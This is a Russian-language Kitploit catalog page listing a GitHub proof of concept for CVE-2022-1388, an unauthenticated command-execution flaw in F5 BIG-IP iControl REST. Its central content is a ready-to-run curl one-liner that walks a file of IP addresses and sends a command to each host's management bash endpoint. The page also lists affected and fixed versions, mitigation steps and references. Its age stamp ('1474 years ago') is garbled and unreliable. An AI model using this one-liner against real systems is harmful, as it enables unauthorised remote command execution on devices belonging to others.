Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1388 — Уязвимость BIG-IP iControl REST CVE-2022-1388 PoC | Kitploit
Инструменты/GitHubGitHub/shamo0/cve-2022-1388
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubshamo0/cve-2022-1388

CVE-2022-1388

Уязвимость BIG-IP iControl REST CVE-2022-1388 PoC

Репозиторий
1474 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для уязвимости BIG-IP iControl REST CVE-2022-1388

f5logo

Эта уязвимость может позволить неаутентифицированному злоумышленнику, имеющему сетевой доступ к системе BIG-IP через порт управления и/или self IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы, либо отключать сервисы.

PoC

Вы можете использовать следующую однострочную команду curl для проверки уязвимости F5 Big-IP или воспользоваться предоставленным Python-скриптом.

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

Уязвимые версии (Big-IP)

ВетвьУязвимые версииИсправления
11.x11.6.1-11.6.5Исправления нет
12.x12.1.0-12.1.6Исправления нет
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xНет17.0.0

Смягчение последствий

  • Обновитесь до исправленной версии из столбца ```Исправления```. (Предпочтительный способ)
  • Заблокируйте доступ к iControl REST через self IP-адрес
  • Заблокируйте доступ к iControl REST через интерфейс управления
  • Измените конфигурацию httpd в BIG-IP

Для получения дополнительной информации о мерах защиты обратитесь к разделу «Ссылки».

Ссылки

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
Скачать инструмент